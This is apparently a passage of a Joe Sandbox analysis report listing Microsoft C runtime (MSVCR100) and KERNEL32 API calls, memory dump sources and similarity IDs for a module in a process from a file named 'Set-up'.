                                                                                                • Part of subcall function 6BBAAC51: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BBAACAF
                                                                                                • Part of subcall function 6BBAAC51: _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000), ref: 6BBAACBD
                                                                                              • GetLastError.KERNEL32 ref: 6BB9BCEF
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9BD07
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000), ref: 6BB9BD15
                                                                                              • SetThreadPriority.KERNEL32(00000000,0000000F), ref: 6BB9BD1D
                                                                                              • GetLastError.KERNEL32 ref: 6BB9BD27
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionThreadThrow$CreatePriority
                                                                                              • String ID:
                                                                                              • API String ID: 3804766065-0
                                                                                              APIs
                                                                                              • _memset.LIBCMT(?,00000000,0000000C), ref: 6BB9B7A0
                                                                                              • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB9B7A8
                                                                                                • Part of subcall function 6BB9B6C7: __EH_prolog3.LIBCMT ref: 6BB9B6CE
                                                                                              • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB9B7B2
                                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 6BB9B7C4
                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 6BB9B7CB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Version@$Concurrency@@Manager@1@ProcessResource$AffinityCurrentH_prolog3Mask_memset
                                                                                              • String ID:
                                                                                              • API String ID: 4257252171-0
                                                                                              APIs
                                                                                              • __doserrno.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB6A780
                                                                                              • __doserrno.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB90417
                                                                                              • _errno.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB9041F
                                                                                              • _errno.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB90432
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB9043D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 2315031519-0
                                                                                              APIs
                                                                                                • Part of subcall function 6BB9B834: __EH_prolog3.LIBCMT ref: 6BB9B83B
                                                                                              • TlsAlloc.KERNEL32 ref: 6BBA009D
                                                                                              • GetLastError.KERNEL32 ref: 6BBA00AD
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BBA00C6
                                                                                              • _CxxThrowException.MSVCR100(00000000,6BBFFEB4,00000000), ref: 6BBA00D5
                                                                                              • Concurrency::details::UMSThreadScheduler::OneShotStaticConstruction.LIBCMT ref: 6BBA00DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorConstructionErrorExceptionH_prolog3LastScheduler::ShotStaticThreadThrow
                                                                                              • String ID:
                                                                                              • API String ID: 3767078539-0
                                                                                              APIs
                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 6BB544BD
                                                                                                • Part of subcall function 6BB78900: __87except.LIBCMT ref: 6BB7893B
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ErrorHandling__87except__start
                                                                                              • String ID: pow
                                                                                              • API String ID: 2905807303-2276729525
                                                                                              APIs
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,?,?,00000000,?,00000000), ref: 6BB9D1B0
                                                                                              • _memset.LIBCMT(00000000,00000000,?,00000000,?,?,00000000,?,00000000), ref: 6BB9D1C3
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID: $$,
                                                                                              • API String ID: 2102423945-53852779
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo_wcslen
                                                                                              • String ID: I
                                                                                              • API String ID: 3151729805-3707901625
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo_strlen
                                                                                              • String ID: I
                                                                                              • API String ID: 1245117036-3707901625
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 2959964966-0
                                                                                              APIs
                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000), ref: 6BB6B7A7
                                                                                              • GetCPInfo.KERNEL32(00000000,?), ref: 6BB6B7BA
                                                                                              • _memset.LIBCMT(0000001D,00000000,00000101), ref: 6BB6B7D2
                                                                                              • _memset.LIBCMT(0000001D,00000000,00000101,00000000,?,00000000), ref: 6BB8A8ED
                                                                                              Similarity
                                                                                              • API ID: _memset$CodeInfoPageValid
                                                                                              • String ID:
                                                                                              • API String ID: 1608968462-0
                                                                                              APIs
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,6BBA0AF2), ref: 6BB98FFA
                                                                                              • _memset.LIBCMT(00000000,00000000,?,00000000,6BBA0AF2), ref: 6BB9900D
                                                                                              • ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,6BBA0AF2), ref: 6BB99014
                                                                                              • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100(?,?,?,?,?,6BBA0AF2), ref: 6BB9905F
                                                                                              Similarity
                                                                                              • API ID: Spin$??2@Concurrency@@Once@?$_Wait@$00@details@_memset
                                                                                              • String ID:
                                                                                              • API String ID: 4058414921-0
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo_mbsdec
                                                                                              • String ID:
                                                                                              • API String ID: 1897159254-0
                                                                                              APIs
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000), ref: 6BB96DB6
                                                                                              • _memset.LIBCMT(00000000,00000000,?,00000000,00000000), ref: 6BB96DC9
                                                                                              • ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,00000000), ref: 6BB96DD0
                                                                                              • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100(?,?,?,?,?,00000000), ref: 6BB96E1B
                                                                                              Similarity
                                                                                              • API ID: Spin$??2@Concurrency@@Once@?$_Wait@$00@details@_memset
                                                                                              • String ID:
                                                                                              • API String ID: 4058414921-0
                                                                                              APIs
                                                                                              • _isleadbyte_l.MSVCR100(?,?,?,?,?,?), ref: 6BB692C2
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 6BB692E8
                                                                                              • _errno.MSVCR100(?,?,?,?), ref: 6BB8A17D
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide_errno_isleadbyte_l
                                                                                              • String ID:
                                                                                              • API String ID: 911568377-0
                                                                                              APIs
                                                                                              • __isctype_l.LIBCMT(7FFFFFFF,00000001,00000000,?,7FFFFFFF,00000000,00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6BB8A2E4
                                                                                              • _isleadbyte_l.MSVCR100(00000008,00000000,?,7FFFFFFF,00000000,00000000,00000000,00000000,?), ref: 6BB8A320
                                                                                              • __crtLCMapStringA.MSVCR100(00000000,?,00000100,00000000,00000001,7FFFFFFF,00000003,?,00000001,?,7FFFFFFF,00000000,00000000,00000000,00000000,?), ref: 6BB8A36D
                                                                                              Similarity
                                                                                              • API ID: String__crt__isctype_l_isleadbyte_l
                                                                                              APIs
                                                                                              • _CallDestructExceptionObject.LIBCMT ref: 6BB5F721
                                                                                              • _global_unwind2.MSVCR100(?), ref: 6BB5F72D
                                                                                              • _local_unwind2.MSVCR100(?,?), ref: 6BB5F73A
                                                                                              • _local_unwind2.MSVCR100(?,000000FF), ref: 6BB5F790
                                                                                              Similarity
                                                                                              • API ID: _local_unwind2$CallDestructExceptionObject_global_unwind2
                                                                                              APIs
                                                                                              • ?_SpinOnce@?$_SpinWait@$0A@@details@Concurrency@@QAE_NXZ.MSVCR100(?,?,?,?,?,6BB96670,0000002C,6BB969F9), ref: 6BB9652C
                                                                                                • Part of subcall function 6BB96E51: _SpinWait.LIBCMT(00000FA0,00000FA0,?,6BB9AD21,00000000), ref: 6BB96E6B
                                                                                              • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100 ref: 6BB96572
                                                                                              • ?_TryAcquireWrite@_ReaderWriterLock@details@Concurrency@@QAE_NXZ.MSVCR100 ref: 6BB965C2
                                                                                              • Sleep.KERNEL32(00000001), ref: 6BB965E2
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@Spin$AcquireLock@details@ReaderWrite@_Writer$A@@details@Once@?$_SleepWaitWait@$0
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              APIs
                                                                                              • _towlower_l.MSVCR100(?,?,?), ref: 6BB6973E
                                                                                                • Part of subcall function 6BB62939: iswctype.MSVCR100(?,00000001,?,?,?,?,?,?,?), ref: 6BB6297D
                                                                                              • _towlower_l.MSVCR100(?,?,?,?,?), ref: 6BB6974E
                                                                                              • _errno.MSVCR100 ref: 6BB8C6CA
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB8C6D5
                                                                                              Similarity
                                                                                              • API ID: _towlower_l$_errno_invalid_parameter_noinfoiswctype
                                                                                              APIs
                                                                                                • Part of subcall function 6BB9A9A9: _fabs.LIBCMT(00000000,00000000,00000000,00000000,?,6BB9A8D7,00000000,00000000,?,6BB9A6BD), ref: 6BB9A9E1
                                                                                              • sqrt.MSVCR100(?,?,?,?,?), ref: 6BB9A85F
                                                                                              • _fabs.LIBCMT(?,?,?,?,?), ref: 6BB9A86D
                                                                                                • Part of subcall function 6BBE1157: __ctrlfp.LIBCMT ref: 6BBE1170
                                                                                                • Part of subcall function 6BBE1157: __except1.LIBCMT ref: 6BBE11BC
                                                                                              • _fabs.LIBCMT(?,?,?,?,?), ref: 6BB9A88E
                                                                                              • exp.MSVCR100(?,?,?,?,?), ref: 6BB9A89C
                                                                                              Similarity
                                                                                              • API ID: _fabs$__ctrlfp__except1sqrt
                                                                                              APIs
                                                                                              • _wcspbrk.LIBCMT(?,6BB76018,?,00000000,6BB76602,?,?,?,?,?,?,6BB759BB), ref: 6BB75FF5
                                                                                              • _calloc_crt.MSVCR100(00000004,00000001,?,00000000,6BB76602,?,?,?,?,?,?,6BB759BB), ref: 6BB7603C
                                                                                              • free.MSVCR100(00000000,?,00000000,6BB76602,?,?,?,?,?,?,6BB759BB), ref: 6BB76078
                                                                                              • _wmatch.LIBCMT ref: 6BB87738
                                                                                                • Part of subcall function 6BB75F95: _malloc_crt.MSVCR100(00000008,?,6BBACE77,?,00000000,-00000002,6BC04BD8), ref: 6BB75F9C
                                                                                              Similarity
                                                                                              • API ID: _calloc_crt_malloc_crt_wcspbrk_wmatchfree
                                                                                              APIs
                                                                                              • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,000000FF), ref: 6BB97D63
                                                                                              • GetLastError.KERNEL32 ref: 6BB97D70
                                                                                              • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,000000FF), ref: 6BB97D82
                                                                                                • Part of subcall function 6BB97406: CreateTimerQueue.KERNEL32(ECA782CA,?,00000000,ECA782CA,?,00000000,ECA782CA,00000000,6BB95CBE,6BB95C86), ref: 6BB9742E
                                                                                                • Part of subcall function 6BB97406: std::exception::exception.LIBCMT(6BB95C86,00000001,ECA782CA,?,00000000,ECA782CA), ref: 6BB97487
                                                                                                • Part of subcall function 6BB97406: _CxxThrowException.MSVCR100(ECA782CA,6BB6BDD8,6BB95C86,00000001,ECA782CA,?,00000000,ECA782CA), ref: 6BB9749C
                                                                                              • DeleteTimerQueueTimer.KERNEL32(00000000,?,000000FF), ref: 6BB97D88
                                                                                              Similarity
                                                                                              • API ID: Timer$Concurrency@@QueueQueue@details@Shared$CreateDeleteErrorExceptionLastThrowstd::exception::exception
                                                                                              APIs
                                                                                              • TlsSetValue.KERNEL32(?,?,00000000,?,?,?,6BBA0A36,00000000,00000001,?,?,6BBA0A58), ref: 6BBA0B2B
                                                                                              • QueryDepthSList.KERNEL32(?,?,00000000,?,?,?,6BBA0A36,00000000,00000001,?,?,6BBA0A58), ref: 6BBA0B3F
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,6BBA0A36,00000000,00000001,?,?,6BBA0A58), ref: 6BBA0B61
                                                                                              • InterlockedPushEntrySList.KERNEL32(?,-00000004,?,?,?,6BBA0A36,00000000,00000001,?,?,6BBA0A58), ref: 6BBA0B79
                                                                                              Similarity
                                                                                              • API ID: List$CloseDepthEntryHandleInterlockedPushQueryValue
                                                                                              APIs
                                                                                              • _lock_file.MSVCR100(?,6BB6CE28,00000014), ref: 6BB6CDD4
                                                                                                • Part of subcall function 6BB6A557: _lock.MSVCR100(?,?,?,6BBB6EA0,00000040,6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BB6A584
                                                                                              • _fgetwc_nolock.MSVCR100(?,?,?,6BB6CE28,00000014), ref: 6BB6CDE9
                                                                                              • _errno.MSVCR100(6BB6CE28,00000014), ref: 6BB72E04
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BB6CE28,00000014), ref: 6BB886B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: _errno_fgetwc_nolock_invalid_parameter_noinfo_lock_lock_file
                                                                                              • String ID:
                                                                                              • API String ID: 3916178533-0
                                                                                              APIs
                                                                                              • std::exception::exception.LIBCMT(?), ref: 6BB99107
                                                                                                • Part of subcall function 6BBD3502: std::exception::_Copy_str.LIBCMT(6BBA2171,?,?,6BBA2171,6BBA1FE2,?,6BBA1FE2,00000001), ref: 6BBD351D
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFE98), ref: 6BB9911C
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB9913A
                                                                                              • SetEvent.KERNEL32(?), ref: 6BB99185
                                                                                              Similarity
                                                                                              • API ID: Concurrency::unsupported_os::unsupported_osCopy_strEventExceptionThrowstd::exception::_std::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 1689211050-0
                                                                                              APIs
                                                                                              • std::exception::exception.LIBCMT(?), ref: 6BB9935C
                                                                                                • Part of subcall function 6BBD3502: std::exception::_Copy_str.LIBCMT(6BBA2171,?,?,6BBA2171,6BBA1FE2,?,6BBA1FE2,00000001), ref: 6BBD351D
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFE78,?), ref: 6BB99371
                                                                                                • Part of subcall function 6BB777D4: RaiseException.KERNEL32(?,?,6BB8F317,?,?,?,?,?,6BB8F317,?,6BB6BDD8,6BC07580), ref: 6BB77813
                                                                                              • SignalObjectAndWait.KERNEL32(?,?,000000FF,00000001), ref: 6BB993BA
                                                                                              • SetEvent.KERNEL32(?), ref: 6BB993C9
                                                                                              Similarity
                                                                                              • API ID: Exception$Copy_strEventObjectRaiseSignalThrowWaitstd::exception::_std::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 1437111950-0
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT(00000000,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB6FCD5
                                                                                              • _wcslen.LIBCMT(00000000,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB6FCE8
                                                                                              • _wcsnicoll.MSVCR100(00000000,00000000,00000000,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB6FD05
                                                                                              • ___mbtow_environ.LIBCMT ref: 6BB9086D
                                                                                              Similarity
                                                                                              • API ID: _wcslen$___mbtow_environ_wcsnicoll
                                                                                              • String ID:
                                                                                              • API String ID: 3727037093-0
                                                                                              APIs
                                                                                              • _fileno.MSVCR100(?,?,00000001), ref: 6BB72431
                                                                                              • _lseek.MSVCR100(00000000,?,00000001), ref: 6BB72438
                                                                                              • _errno.MSVCR100 ref: 6BB88D1F
                                                                                              • _ftell_nolock.MSVCR100(?), ref: 6BB88D33
                                                                                                • Part of subcall function 6BB6A665: _fileno.MSVCR100(?,?,?,?,?,?,?,6BB6A900,?), ref: 6BB6A694
                                                                                                • Part of subcall function 6BB6A665: _write.MSVCR100(00000000,?,?,?,?,?,?,6BB6A900,?), ref: 6BB6A69B
                                                                                              Similarity
                                                                                              • API ID: _fileno$_errno_ftell_nolock_lseek_write
                                                                                              • String ID:
                                                                                              • API String ID: 2052885585-0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BBA039A
                                                                                                • Part of subcall function 6BB9B4E1: ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100 ref: 6BB9B503
                                                                                              • ??0SchedulerPolicy@Concurrency@@QAA@IZZ.MSVCR100(?,00000000,6BC04628,0000000C,6BBA0342,?,?,?,6BB9617E,?,6BBA558F,00000000,6BBA5EC0,?,?,?), ref: 6BBA03DD
                                                                                              • memcpy.MSVCR100(?,?,00000024,6BC04628,0000000C,6BBA0342,?,?,?,6BB9617E,?,6BBA558F,00000000,6BBA5EC0,?,?), ref: 6BBA03F8
                                                                                              • ??3@YAXPAX@Z.MSVCR100(?,?,6BB9617E,?,6BBA558F,00000000,6BBA5EC0,?,?,?,00000000,?,?,?,6BBA5DCC,00000001), ref: 6BBA0422
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@Spin$??3@H_prolog3Once@?$_Policy@SchedulerWait@$00@details@memcpy
                                                                                              • String ID:
                                                                                              • API String ID: 3595554022-0
                                                                                              APIs
                                                                                              • _strlen.LIBCMT(00000000), ref: 6BB72232
                                                                                              • _strlen.LIBCMT(00000000), ref: 6BB72241
                                                                                              • __fassign.LIBCMT(00000000,00000000,00000000), ref: 6BB7225D
                                                                                              • ___wtomb_environ.LIBCMT ref: 6BB90817
                                                                                              Similarity
                                                                                              • API ID: _strlen$___wtomb_environ__fassign
                                                                                              • String ID:
                                                                                              • API String ID: 1283471604-0
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: _errno_memset_msizerealloc
                                                                                              • String ID:
                                                                                              • API String ID: 1728161066-0
                                                                                              APIs
                                                                                              • _calloc_crt.MSVCR100(00000001,00000164), ref: 6BB67F23
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB75B3B
                                                                                              • ___free_lc_time.LIBCMT ref: 6BB91681
                                                                                              • free.MSVCR100(00000000,00000000), ref: 6BB91687
                                                                                              Similarity
                                                                                              • API ID: DecrementInterlocked___free_lc_time_calloc_crtfree
                                                                                              • String ID:
                                                                                              • API String ID: 1841316378-0
                                                                                              APIs
                                                                                              • _errno.MSVCR100(00000000,00000000), ref: 6BB8AA85
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000000,00000000), ref: 6BB8AA90
                                                                                              • _errno.MSVCR100(00000000,00000000,00000000), ref: 6BB8AA99
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,00000000), ref: 6BB8AAA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              APIs
                                                                                                • Part of subcall function 6BBA0376: TlsGetValue.KERNEL32(6BB96C15,6BB95BAE,?,?,?,6BB95B14,?), ref: 6BBA037C
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT(?,00000000,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BBA0AAB
                                                                                                • Part of subcall function 6BB9816F: std::exception::exception.LIBCMT(?,00000000,?,?,6BBA0AB0,?,00000000), ref: 6BB98183
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFFD4,?,00000000,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BBA0AB9
                                                                                                • Part of subcall function 6BB777D4: RaiseException.KERNEL32(?,?,6BB8F317,?,?,?,?,?,6BB8F317,?,6BB6BDD8,6BC07580), ref: 6BB77813
                                                                                              • TlsSetValue.KERNEL32(00000000), ref: 6BBA0AD4
                                                                                              • TlsSetValue.KERNEL32(00000000,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BBA0AFE
                                                                                              Similarity
                                                                                              • API ID: Value$Exception$Concurrency::unsupported_os::unsupported_osRaiseThrowstd::exception::exception
                                                                                              APIs
                                                                                              • std::exception::exception.LIBCMT(?), ref: 6BB98770
                                                                                                • Part of subcall function 6BBD3502: std::exception::_Copy_str.LIBCMT(6BBA2171,?,?,6BBA2171,6BBA1FE2,?,6BBA1FE2,00000001), ref: 6BBD351D
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFE98), ref: 6BB98785
                                                                                              • TlsGetValue.KERNEL32(?), ref: 6BB98796
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB987AE
                                                                                              Similarity
                                                                                              • API ID: Concurrency::unsupported_os::unsupported_osCopy_strExceptionThrowValuestd::exception::_std::exception::exception
                                                                                              APIs
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6BBA7F10
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000), ref: 6BBA7F1D
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000,00000000), ref: 6BBA7F35
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000,?,00000000,00000000), ref: 6BBA7F43
                                                                                              Similarity
                                                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventExceptionLastThrow
                                                                                              APIs
                                                                                                • Part of subcall function 6BBA0376: TlsGetValue.KERNEL32(6BB96C15,6BB95BAE,?,?,?,6BB95B14,?), ref: 6BBA037C
                                                                                              • SetEvent.KERNEL32(?), ref: 6BB98CD8
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB98CEA
                                                                                                • Part of subcall function 6BB96B4E: _memset.LIBCMT(?,00000000,0000003E,00000002,6BBA0AF2), ref: 6BB96B6D
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEEC), ref: 6BB98CF8
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB98D00
                                                                                              Similarity
                                                                                              • API ID: Concurrency::unsupported_os::unsupported_os$EventExceptionThrowValue_memset
                                                                                              APIs
                                                                                              • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,00000000), ref: 6BB97E0C
                                                                                                • Part of subcall function 6BB97406: CreateTimerQueue.KERNEL32(ECA782CA,?,00000000,ECA782CA,?,00000000,ECA782CA,00000000,6BB95CBE,6BB95C86), ref: 6BB9742E
                                                                                                • Part of subcall function 6BB97406: std::exception::exception.LIBCMT(6BB95C86,00000001,ECA782CA,?,00000000,ECA782CA), ref: 6BB97487
                                                                                                • Part of subcall function 6BB97406: _CxxThrowException.MSVCR100(ECA782CA,6BB6BDD8,6BB95C86,00000001,ECA782CA,?,00000000,ECA782CA), ref: 6BB9749C
                                                                                              • GetLastError.KERNEL32 ref: 6BB97E19
                                                                                              • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,00000000), ref: 6BB97E2B
                                                                                              • DeleteTimerQueueTimer.KERNEL32(00000000,?,00000000), ref: 6BB97E31
                                                                                              Similarity
                                                                                              • API ID: Timer$Concurrency@@QueueQueue@details@Shared$CreateDeleteErrorExceptionLastThrowstd::exception::exception
                                                                                              APIs
                                                                                              • _strlen.LIBCMT(00000001,?,00000000,00000000,?,6BBACA68,?,00000000,00000001,6BC06CD0), ref: 6BB75B5C
                                                                                              • malloc.MSVCR100(00000001,00000001,?,00000000,00000000,?,6BBACA68,?,00000000,00000001,6BC06CD0), ref: 6BB75B65
                                                                                                • Part of subcall function 6BB60233: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6BB60CEA,00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7), ref: 6BB60263
                                                                                              • strcpy_s.MSVCR100(00000000,00000001,00000001,?,00000000,00000000,?,6BBACA68,?,00000000,00000001,6BC06CD0), ref: 6BB75B77
                                                                                              • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,00000000,00000001,6BC06CD0), ref: 6BB89624
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap__invoke_watson_strlenmallocstrcpy_s
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BBAB453
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000100,00000000,6BB9686B,00000000,?,?,?,6BBA5DCC,00000001), ref: 6BBAB474
                                                                                              • _memset.LIBCMT(00000000,00000000,00000100,00000000,6BB9686B,00000000,?,?,?,6BBA5DCC,00000001), ref: 6BBAB485
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000100,00000000,00000000,00000100,00000000,6BB9686B,00000000,?,?,?,6BBA5DCC,00000001), ref: 6BBAB4B1
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_memset
                                                                                              APIs
                                                                                              • _getptd.MSVCR100(6BB64EF0,0000000C,6BB89FD5,?,?,6BB69233,?), ref: 6BB64E9C
                                                                                              • _lock.MSVCR100(0000000C), ref: 6BB64EB3
                                                                                                • Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E
